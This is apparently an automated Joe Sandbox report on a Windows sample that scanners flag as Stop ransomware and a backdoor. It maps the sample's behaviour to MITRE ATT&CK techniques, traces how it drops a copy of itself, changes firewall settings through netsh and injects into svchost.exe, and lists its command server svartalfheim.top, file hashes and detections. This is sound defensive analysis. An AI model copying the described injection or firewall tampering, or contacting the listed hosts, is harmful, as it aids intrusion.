        Source: Yara matchFile source: 17.3.qbxctmyn.exe.e50000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.3.file.exe.21c0000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.qbxctmyn.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.qbxctmyn.exe.e90000.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.qbxctmyn.exe.e30e67.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 23.2.svchost.exe.120000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.310889841.0000000000E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000003.309369013.0000000000E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.279056535.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: file.exe PID: 5128, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: qbxctmyn.exe PID: 4532, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 2888, type: MEMORYSTR

        Remote Access Functionality

        Source: Yara matchFile source: 0.2.file.exe.2080e67.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.qbxctmyn.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 23.2.svchost.exe.120000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.qbxctmyn.exe.e90000.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.3.qbxctmyn.exe.e50000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.3.file.exe.21c0000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.qbxctmyn.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.qbxctmyn.exe.e90000.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.qbxctmyn.exe.e30e67.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 23.2.svchost.exe.120000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.310889841.0000000000E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000003.309369013.0000000000E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.279056535.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: file.exe PID: 5128, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: qbxctmyn.exe PID: 4532, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 2888, type: MEMORYSTR
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004088B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname,0_2_004088B0
        Source: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exeCode function: 17_2_004088B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname,17_2_004088B0
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_001288B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname,23_2_001288B0
MITRE ATT&CK matrix, listed per tactic column (a leading number is the count badge the report attaches to that technique):

Initial Access: 1 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools
Execution: 1 Windows Management Instrumentation; 41 Native API; 2 Command and Scripting Interpreter; 3 Service Execution; Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell; AppleScript; Windows Command Shell
Persistence: 1 DLL Side-Loading; 1 Valid Accounts; 14 Windows Service; Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows); Cron
Privilege Escalation: 1 DLL Side-Loading; 1 Valid Accounts; 1 Access Token Manipulation; 14 Windows Service; 412 Process Injection; Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows); Cron
Defense Evasion: 3 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 21 Software Packing; 1 DLL Side-Loading; 1 File Deletion; 121 Masquerading; 1 Valid Accounts; 12 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 412 Process Injection
Credential Access: 1 Input Capture; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture
Discovery: 2 System Time Discovery; 1 Account Discovery; 1 File and Directory Discovery; 25 System Information Discovery; 141 Security Software Discovery; 12 Virtualization/Sandbox Evasion; 1 Process Discovery; 1 System Owner/User Discovery; 1 Remote System Discovery; 1 System Network Configuration Discovery; Permission Groups Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools; Taint Shared Content; Replication Through Removable Media
Collection: 1 Archive Collected Data; 1 Input Capture; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol; Exfiltration Over Physical Medium
Command and Control: 1 Ingress Tool Transfer; 12 Encrypted Channel; 1 Non-Application Layer Protocol; 112 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction; Data Encrypted for Impact; Service Stop
Behavior Graph ID: 800802; Sample: file.exe; Start date: 07/02/2023; Architecture: WINDOWS; Score: 100

• Start node: DNS/IP: microsoft-com.mail.protection.outlook.com. Signatures: Snort IDS alert for network traffic; Multi AV Scanner detection for domain / URL; Malicious sample detected (through community Yara rule); 7 other signatures. Started: qbxctmyn.exe, file.exe, svchost.exe, 8 other processes.
• qbxctmyn.exe: Signatures: Detected unpacking (changes PE section rights); Detected unpacking (overwrites its own PE header); Writes to foreign memory regions; 2 other signatures. Started: svchost.exe.
• file.exe: Dropped: C:\Users\user\AppData\Local\...\qbxctmyn.exe (PE32). Signatures: Uses netsh to modify the Windows network and firewall settings; Modifies the windows firewall. Started: cmd.exe, netsh.exe, cmd.exe, 3 other processes.
• svchost.exe: Signatures: Changes security center settings (notifications, updates, antivirus, firewall). Started: MpCmdRun.exe.
• 8 other processes: Signatures: Query firmware table information (likely to detect VMs).
• svchost.exe (started by qbxctmyn.exe): DNS/IP: svartalfheim.top 176.124.192.220, ports 443, 49704, 49705, GULFSTREAMUA, Russian Federation; microsoft-com.mail.protection.outlook.com 104.47.54.36, ports 25, 49703, MICROSOFT-CORP-MSN-AS-BLOCKUS, United States. Signatures: System process connects to network (likely due to code injection or exploit); Deletes itself after installation.
• cmd.exe: Dropped: C:\Windows\SysWOW64\...\qbxctmyn.exe (copy) (PE32). Started: conhost.exe.
• netsh.exe, cmd.exe, MpCmdRun.exe and the 3 other processes each started conhost.exe (seven conhost.exe instances in total).

Source | Detection | Scanner | Label | Link
file.exe | 44% | ReversingLabs | Win32.Ransomware.Stop |
file.exe | 34% | Virustotal | | Browse
file.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\qbxctmyn.exe | 100% | Avira | TR/Crypt.XPACK.Gen |
C:\Users\user\AppData\Local\Temp\qbxctmyn.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link | Download
17.2.qbxctmyn.exe.400000.0.unpack | 100% | Avira | BDS/Backdoor.Gen | | Download File
23.2.svchost.exe.120000.0.unpack | 100% | Avira | BDS/Backdoor.Gen | | Download File
17.2.qbxctmyn.exe.e90000.2.unpack | 100% | Avira | BDS/Backdoor.Gen | | Download File
0.2.file.exe.2080e67.1.unpack | 100% | Avira | TR/Patched.Ren.Gen | | Download File
23.3.svchost.exe.649000.1.unpack | 100% | Avira | HEUR/AGEN.1253311 | | Download File
23.3.svchost.exe.649000.2.unpack | 100% | Avira | HEUR/AGEN.1253311 | | Download File
23.3.svchost.exe.649000.4.unpack | 100% | Avira | HEUR/AGEN.1253311 | | Download File
23.3.svchost.exe.649000.3.unpack | 100% | Avira | HEUR/AGEN.1253311 | | Download File
0.2.file.exe.400000.0.unpack | 100% | Avira | BDS/Backdoor.Gen | | Download File
0.3.file.exe.21c0000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen | | Download File
17.2.qbxctmyn.exe.e30e67.1.unpack | 100% | Avira | TR/Patched.Ren.Gen | | Download File
17.3.qbxctmyn.exe.e50000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen | | Download File

Source | Detection | Scanner | Label | Link
svartalfheim.top | 18% | Virustotal | | Browse

Source | Detection | Scanner | Label | Link
https://%s.xboxlive.com | 0% | URL Reputation | safe |
jotunheim.name:443 | 0% | URL Reputation | safe |
https://dynamic.t | 0% | URL Reputation | safe |
svartalfheim.top:443 | 0% | URL Reputation | safe |
https://%s.dnet.xboxlive.com | 0% | URL Reputation | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
svartalfheim.top | 176.124.192.220 | true | true | | unknown
microsoft-com.mail.protection.outlook.com | 104.47.54.36 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
jotunheim.name:443 | true | URL Reputation: safe | unknown
svartalfheim.top:443 | true | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
176.124.192.220 | svartalfheim.top | Russian Federation | 59652 | GULFSTREAMUA | true
104.47.54.36 | microsoft-com.mail.protection.outlook.com | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
Joe Sandbox Version: 36.0.0 Rainbow Opal
Analysis ID: 800802
Start date and time: 2023-02-07 20:03:06 +01:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 10m 12s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 26
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample file name: file.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@34/16@5/2
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 49.5% (good quality ratio 47.1%)
• Quality average: 86.9%
• Quality standard deviation: 25.3%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 62
• Number of non-executed functions: 259
Cookbook Comments:
• Found application associated with file extension: .exe
• Excluded IPs from analysis (whitelisted): 20.112.52.29, 20.81.111.85, 20.84.181.62, 20.103.85.33, 20.53.203.50
• Excluded domains from analysis (whitelisted): fs.microsoft.com, microsoft.com
• Not all processes were analysed; the report is missing behavior information.
• Report creation exceeded the maximum time and may be missing disassembly code information.
• Report size exceeded the maximum capacity and may be missing behavior information.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
20:05:14 | API Interceptor | 2x Sleep call for process: svchost.exe modified
20:05:29 | API Interceptor | 1x Sleep call for process: MpCmdRun.exe modified
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                              176.124.192.220MKux1L12Hd.exeGet hashmaliciousBrowse
                                                                              • avtlsgosecure.com/
                                                                              M5jKYa84lZ.exeGet hashmaliciousBrowse
                                                                              • avtlsgosecure.com/
                                                                              YJxaWrcrpx.exeGet hashmaliciousBrowse
                                                                              • avtlsgosecure.com/
                                                                              RssqBuHzC8.exeGet hashmaliciousBrowse
                                                                              • avtlsgosecure.com/
                                                                              vBlasFEGDm.exeGet hashmaliciousBrowse
                                                                              • avtlsgosecure.com/
                                                                              sRsnwIR3OT.exeGet hashmaliciousBrowse
                                                                              • avtlsgosecure.com/
                                                                              hYnwQ9e9qJ.exeGet hashmaliciousBrowse
                                                                              • avtlsgosecure.com/
                                                                              NnagALyUEt.exeGet hashmaliciousBrowse
                                                                              • avtlsgosecure.com/
                                                                              MJterhxmLp.exeGet hashmaliciousBrowse
                                                                              • avtlsgosecure.com/
                                                                              NjzgsF1ggq.exeGet hashmaliciousBrowse
                                                                              • avtlsgosecure.com/
                                                                              afxHNVJH2L.exeGet hashmaliciousBrowse
                                                                              • avtlsgosecure.com/
                                                                              LGdWroB8YK.exeGet hashmaliciousBrowse
                                                                              • avtlsgosecure.com/
                                                                              VzTxDq5EOO.exeGet hashmaliciousBrowse
                                                                              • avtlsgosecure.com/
                                                                              cMoMTuExNm.exeGet hashmaliciousBrowse
                                                                              • avtlsgosecure.com/
                                                                              Ep3t7iZ5dS.exeGet hashmaliciousBrowse
                                                                              • avtlsgosecure.com/
                                                                              YUlLw3N2sv.exeGet hashmaliciousBrowse
                                                                              • avtlsgosecure.com/
                                                                              XUFcpxTVvC.exeGet hashmaliciousBrowse
                                                                              • avtlsgosecure.com/
                                                                              Ta8fqo9ZLt.exeGet hashmaliciousBrowse
                                                                              • avtlsgosecure.com/
                                                                              Mx2eEjLekY.exeGet hashmaliciousBrowse
                                                                              • avtlsgosecure.com/
                                                                              bFX12nhbOR.exeGet hashmaliciousBrowse
                                                                              • avtlsgosecure.com/
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
No context
No context
Process: C:\Windows\System32\svchost.exe
File Type: XML 1.0 document, ASCII text, with very long lines (2494), with no line terminators
Category: dropped
Size (bytes): 2494
Entropy (8bit): 5.2403296958449355
Encrypted: false
SSDEEP: 24:2dS48pX4y/DvKWDkQpyH2YX8ICDKbNRTrxKTBM2JT52YwFPYzKEqXpUfKFkeRupB:cAn/TLtfGgzmQLeUp/B8HoSkC9+TIYAs
MD5: BDC008D0C34A85E8B2CF0502871A8D73
SHA1: 0DBF1368F6D3C401D410BFA69B1A0E1BCBCE2558
SHA-256: 514AD1AC5994134A6314AD8A504B79EB558775C1E0269F811B1C11F2CF26AD12
SHA-512: 0D495FCB897BFF1A3530F9F6684770082BC330131B26E263C9E55B04288B6E36F8DFEE9A6B61566809F55DB353C8B35FCF0A8E5D7352307F5DBEBC5A7C9FF8FC
Malicious: false
Preview: <?xml version="1.0" encoding="UTF-8"?><updateStore><sessionVariables><permanent><AUOptions dataType="3">1</AUOptions><AllowMUUpdateService dataType="3">0</AllowMUUpdateService><AreUpdatesPausedByPolicy dataType="11">False</AreUpdatesPausedByPolicy><AttentionRequiredReason dataType="19">0</AttentionRequiredReason><CurrentState dataType="19">1</CurrentState><FirstScanAttemptTime dataType="21">132399969272148706</FirstScanAttemptTime><FlightEnabled dataType="3">0</FlightEnabled><LastError dataType="19">0</LastError><LastErrorState dataType="19">0</LastErrorState><LastErrorStateType dataType="11">False</LastErrorStateType><LastMeteredScanTime dataType="21">132399969272304939</LastMeteredScanTime><LastScanAttemptTime dataType="21">132399969272148706</LastScanAttemptTime><LastScanDeferredReason dataType="19">1</LastScanDeferredReason><LastScanDeferredTime dataType="21">133051593686244000</LastScanDeferredTime><LastScanFailureError dataType="3">-2147023838</LastScanFailureError><LastScanFailu

Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 8192
Entropy (8bit): 3.7601426671271163
Encrypted: false
SSDEEP: 96:uoi8itI/ZndZNnAp9Z61zZs4Z5k907HUffZ3AZOX6Z6NZeA3CbZTQZMTkInZLpQ:Zi8ite3NneWpmaXid0eMYiLpQ
MD5: 4D6F0CCB342CAC8385F7158440CBB800
SHA1: 7B2187390048610B2C82A361A2E8EEEF0868C21B
SHA-256: 7C33E7A878DA01E5E1825603194C2C9E0FB8F260B8AB331613C2EB0B327A3864
SHA-512: 4462E8CCF3268C46377E67F9799A7B01EBA24717B84F8E14C84FCA92F42609D573B1C1D4AE5CDB502C2FA4D1B662C81D8F4BC01EA9F4338D4DF128A3350A3218
Malicious: false
Preview: ................................................................................,...0.....`mr;...................B..............Zb..K....(..........................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................%.?...... .......`mr;..........U.p.d.a.t.e.S.e.s.s.i.o.n.O.r.c.h.e.s.t.r.a.t.i.o.n...C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.U.S.O.S.h.a.r.e.d.\.L.o.g.s.\.U.p.d.a.t.e.S.e.s.s.i.o.n.O.r.c.h.e.s.t.r.a.t.i.o.n._.T.e.m.p...1...e.t.l.........P.P.,...0....8gmr;..................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.11004012961626064
Encrypted: false
SSDEEP: 12:26Y3xgXm/Ey6q99950anNq3qQ10nMCldimE8eawHjcogn:26QLl68SagLyMCldzE9BHjcp
MD5: 5398B5971E6A8C924757AD8450DDDCEA
SHA1: 2B0B99C436D023DDB496F8549CDA84AF76EEE48A
SHA-256: F69C7AEF9BE67BA09D2D8A9673475CEA648ED784A96579B02C0883CA73EB6732
SHA-512: F2DD0A29A0C8EBC01C124E0EF7B5B6DC99435C09B631ED0784650C89759E8F71048D4436ED02715A3F2FE3904C00C2132B8468F18D670FD33220FC6D14D93489
Malicious: false
Preview: ........................................................................................j.q......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................%.?...... ........jr;..........S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P.........I.q.....................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.11249012819257488
Encrypted: false
SSDEEP: 12:MxdlDXm/Ey6q99950aOg1miM3qQ10nMCldimE8eawHza1miIrSd:MvIl68SaX1tMLyMCldzE9BHza1tIC
MD5: D1338C24B474F80B9D7A721DDDA3E149
SHA1: C726DCA04341646E0453B24CF482077ADCE7DB74
SHA-256: 6DA48AD356AA520E0FDBE965FD998041401F0C46758DF1ED849DFEB62CC55A15
SHA-512: 132F97E55880EDBCC5807C5CC41613A64F9BB0D7FBC3B1DE400B6438A8BEC3078D999F319CE27C605879023ADBF5DCDB0C2622E4DCF8C4865643FF61CF1AD349
Malicious: false
Preview: ........................................................................................*_o......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................%.?...... ......d.jr;..........U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P..........go.....................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.1125005015962772
Encrypted: false
SSDEEP: 12:MxCnXm/Ey6q99950ap11mK2P3qQ10nMCldimE8eawHza1mK2P:MUWl68SaT1iPLyMCldzE9BHza1I
MD5: F7FF3F878EA4E230282D26BD877E2689
SHA1: 4BC8A22487FA18BFA85E083ADA2C8BAEC128E764
SHA-256: E34E59D46F9316AA83FE293A0F1E3A7BE34C3A908DA952B470D97503DF85E9B1
SHA-512: 41E21EBA179704BCE1BC8B5686B5D372DA9122960BF76919F9ACE30DB677D5C21E00E11599C5C3207ED09FB979BFC29BC4819657FC1C1D28E626B3A333A7C571
Malicious: false
Preview: ..........................................................................................n......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................%.?...... ......<.jr;..........U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P.........N(n.....................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Users\user\Desktop\file.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 12343296
Entropy (8bit): 3.4208454596549234
Encrypted: false
SSDEEP: 6144:4JMjbyLY3DuTsP8d2nQO0o7MFGU15Ts+XAW:4JMjbyM3DW8qQa5TsV
MD5: D83D3102AEE8419201BF810DE2A41992
SHA1: 30EC9FD8B35C5FEC5366FE52C7BF77E57A0C67A2
SHA-256: 4F8B000276DE586232FC912CDB72B497C305E8E13A8DEF72D3A2B0BA2FB7E0C9
SHA-512: F3E9CEF20B8751716F1426DCACDA675F2672F60FF55218CB4A9BEC141A736D2B12E8761BCFC7115CD5F46DF3E5A83F3D399BD110EF37000F31EAEABDAE3BDCA2
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................B.s.....p.....f..............w...a.....q.....t....Rich...........PE..L.....a.....................>......or............@........................................................................l...P...................................@...............................p9..@............................................text............................... ..`.data...0........8..................@....rsrc............ ..................@..@.reloc..n'.......x..................@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):0.11004012961626064
                                                                              Encrypted:false
                                                                              SSDEEP:12:26Y3xgXm/Ey6q99950anNq3qQ10nMCldimE8eawHjcogn:26QLl68SagLyMCldzE9BHjcp
                                                                              MD5:5398B5971E6A8C924757AD8450DDDCEA
                                                                              SHA1:2B0B99C436D023DDB496F8549CDA84AF76EEE48A
                                                                              SHA-256:F69C7AEF9BE67BA09D2D8A9673475CEA648ED784A96579B02C0883CA73EB6732
                                                                              SHA-512:F2DD0A29A0C8EBC01C124E0EF7B5B6DC99435C09B631ED0784650C89759E8F71048D4436ED02715A3F2FE3904C00C2132B8468F18D670FD33220FC6D14D93489
                                                                              Malicious:false
                                                                              Preview:........................................................................................j.q......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................%.?...... ........jr;..........S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P.........I.q.....................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):0.11249012819257488
                                                                              Encrypted:false
                                                                              SSDEEP:12:MxdlDXm/Ey6q99950aOg1miM3qQ10nMCldimE8eawHza1miIrSd:MvIl68SaX1tMLyMCldzE9BHza1tIC
                                                                              MD5:D1338C24B474F80B9D7A721DDDA3E149
                                                                              SHA1:C726DCA04341646E0453B24CF482077ADCE7DB74
                                                                              SHA-256:6DA48AD356AA520E0FDBE965FD998041401F0C46758DF1ED849DFEB62CC55A15
                                                                              SHA-512:132F97E55880EDBCC5807C5CC41613A64F9BB0D7FBC3B1DE400B6438A8BEC3078D999F319CE27C605879023ADBF5DCDB0C2622E4DCF8C4865643FF61CF1AD349
                                                                              Malicious:false
                                                                              Preview:........................................................................................*_o......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................%.?...... ......d.jr;..........U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P..........go.....................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):0.1125005015962772
                                                                              Encrypted:false
                                                                              SSDEEP:12:MxCnXm/Ey6q99950ap11mK2P3qQ10nMCldimE8eawHza1mK2P:MUWl68SaT1iPLyMCldzE9BHza1I
                                                                              MD5:F7FF3F878EA4E230282D26BD877E2689
                                                                              SHA1:4BC8A22487FA18BFA85E083ADA2C8BAEC128E764
                                                                              SHA-256:E34E59D46F9316AA83FE293A0F1E3A7BE34C3A908DA952B470D97503DF85E9B1
                                                                              SHA-512:41E21EBA179704BCE1BC8B5686B5D372DA9122960BF76919F9ACE30DB677D5C21E00E11599C5C3207ED09FB979BFC29BC4819657FC1C1D28E626B3A333A7C571
                                                                              Malicious:false
                                                                               Preview: (binary ETL trace header; readable embedded UTF-16 strings: @tzres.dll,-212, @tzres.dll,-211, UnistackCritical, C:\Users\hardz\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl)
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):8192
                                                                              Entropy (8bit):2.7367341524723185
                                                                              Encrypted:false
                                                                              SSDEEP:48:31Ir52QWsb7kUub7kE7b7klXb7kib7kbIl9lnb7k0tplKb7k0b7k6b7kwQb7k9O:62k0Uu0g010i0U910ClK00060P09O
